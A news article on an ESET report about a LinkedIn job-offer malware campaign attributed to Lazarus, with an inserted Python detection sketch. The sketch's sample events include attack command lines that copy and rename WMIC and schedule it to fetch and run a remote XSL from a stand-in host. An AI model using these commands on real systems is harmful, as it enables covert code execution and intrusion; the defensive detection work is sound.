Cyber Attackers Use Lucrative Job Offers via LinkedIn to Snare Victims
Cyber attackers have used the lure of lucrative job offers via LinkedIn to target aerospace and military company employees in Europe and the Middle East.
The attacks, which took place from September to December 2019, used a malware sample named 'Inception.dll' and are believed to be the work of North Korea's Lazarus Group.
"They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware," said researchers from ESET, who made the discovery. "To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the malware hasn’t been previously documented."
The researchers believe the primary goal of the operation was espionage. However, in one case, attackers used a business email compromise attack as the final stage of the operation.
"First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account," said the researchers. "Rather than paying the invoice, the customer enquired about the requested sum ... (and) ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side."
Contact was initially made via fictitious job offers sent through LinkedIn’s messaging feature. The attackers posed as HR representatives from well-known and credible aerospace and defense companies, such as General Dynamics and Collins Aerospace (formerly Rockwell Collins).
Once a successful contact was made, malicious files - disguised as documents pertinent to the job offer - were placed into the online conversation.
The malicious files were sent either via LinkedIn or via email from fake accounts and OneDrive links. When opened, the LNK shortcut file launched a Command Prompt, which opened a remote PDF file in the target’s default browser.
"That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy," said the researchers. "In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied (WMI Commandline Utility)."
Once 'in', the attackers were able to use an arsenal of tools, including custom, multistage malware, and modified versions of open-source tools.
The attackers attempted to remain undetected by disguising files and folders with the names of well-established software and companies (Intel and Skype, to name two), digitally signing some components of their malware, recompiling the Stage 1 malware numerous times throughout the operation and implementing anti-analysis techniques in their custom malware.
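The execution chain quoted from the researchers above (a copied and renamed WMI Command-line Utility, a scheduled task, and a remote XSL stylesheet) and the disguising of files under vendor names such as Intel and Skype leave telemetry that is cheap to alert on. The following detection sketch is an added example, not code from ESET or from the article: it runs a few rules over constructed process-creation events in the style of Sysmon Event ID 1. The events, paths, task names and URLs are invented for illustration; the real operation's file names are not reproduced here.

```python
"""Detection sketch for a renamed-WMIC / scheduled-task / remote-XSL chain.

Added example. The events below are constructed to resemble Sysmon Event ID 1
(process creation) records; no real indicators from the ESET report are used.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    image: str               # full path of the binary that was executed
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# wmic ... /format: pointing at an http(s) location fetches and runs a remote XSL
REMOTE_XSL = re.compile(r'/format\s*:\s*["\']?\s*https?://', re.I)
# cmd.exe copying the WMI Commandline Utility to a new location/name
WMIC_COPY = re.compile(r'\bcopy\s+"?([^"\s]*wmic\.exe)"?\s+"?([^"\s]+)"?', re.I)


def rules_for(ev: ProcEvent) -> List[str]:
    """Return the names of the rules that fire on one process-creation event."""
    hits: List[str] = []
    img = _basename(ev.image)
    ofn = ev.original_file_name.lower()
    cmd = ev.command_line

    # 1. The PE resource says wmic.exe but the file on disk is called something else
    #    (a renamed copy, typically parked under a vendor-looking folder).
    if ofn == "wmic.exe" and img != "wmic.exe":
        hits.append("renamed_wmic")

    # 2. WMIC (under any name) being told to render output with a remote stylesheet.
    if ofn == "wmic.exe" and REMOTE_XSL.search(cmd):
        hits.append("remote_xsl_execution")

    # 3. A scheduled task being created whose action contains a remote XSL fetch.
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and REMOTE_XSL.search(cmd):
        hits.append("schtasks_remote_xsl")

    # 4. cmd.exe staging the renamed copy of wmic.exe in the first place.
    if img == "cmd.exe":
        m = WMIC_COPY.search(cmd)
        if m and _basename(m.group(2)) != "wmic.exe":
            hits.append("wmic_copied_and_renamed")

    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index -> rule hits, for events that triggered at least one rule."""
    return {i: rules_for(ev) for i, ev in enumerate(events) if rules_for(ev)}


def staging_chain_present(events: List[ProcEvent]) -> bool:
    """True when the copy, task-creation and execution stages all appear."""
    seen = set()
    for ev in events:
        seen.update(rules_for(ev))
    return {"wmic_copied_and_renamed", "schtasks_remote_xsl", "remote_xsl_execution"} <= seen


# Constructed sample telemetry (not real indicators). Folder and task names that
# borrow a vendor name mimic the disguise technique described in the article.
SAMPLE_EVENTS = [
    # benign: WMIC with a local output format
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
              r'wmic os get caption /format:list',
              r"C:\Windows\System32\cmd.exe"),
    # stage: cmd.exe makes a folder and copies wmic.exe under a new name
    ProcEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
              r'cmd.exe /c mkdir "C:\ProgramData\Intel" & copy "C:\Windows\System32\wbem\WMIC.exe" "C:\ProgramData\Intel\intelupdate.exe"',
              r"C:\Windows\System32\cmd.exe"),
    # stage: scheduled task that runs the renamed copy against a remote XSL
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks /create /tn "Intel Update" /sc minute /mo 30 /tr "C:\ProgramData\Intel\intelupdate.exe os get /format:https://example.invalid/update.xsl"',
              r"C:\Windows\System32\cmd.exe"),
    # stage: the task fires; the renamed binary still reports OriginalFileName wmic.exe
    ProcEvent(r"C:\ProgramData\Intel\intelupdate.exe", "wmic.exe",
              r'"C:\ProgramData\Intel\intelupdate.exe" os get /format:https://example.invalid/update.xsl',
              r"C:\Windows\System32\svchost.exe"),
    # benign: an ordinary scheduled task
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks /create /tn Backup /sc daily /tr "C:\Tools\backup.bat"',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, hits)
    print("full chain:", staging_chain_present(SAMPLE_EVENTS))
```

Rule 1 depends on the OriginalFileName field, which Sysmon and several EDR products record from the PE version resource; renaming the file on disk does not change it, which is exactly why the renamed-utility trick is detectable. Rule 2 keys on the `/format:` switch followed by an http(s) URL, the remote-XSL behaviour the researchers describe; local formats such as `/format:list` do not match.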
Nothing firm linked the attacks to a known threat actor.
"However," said ESET, "the method of targeting, use of fake LinkedIn accounts, development environment, and anti-analysis techniques bore strong resemblance to those used by the Lazarus group." (Source: ESET white paper)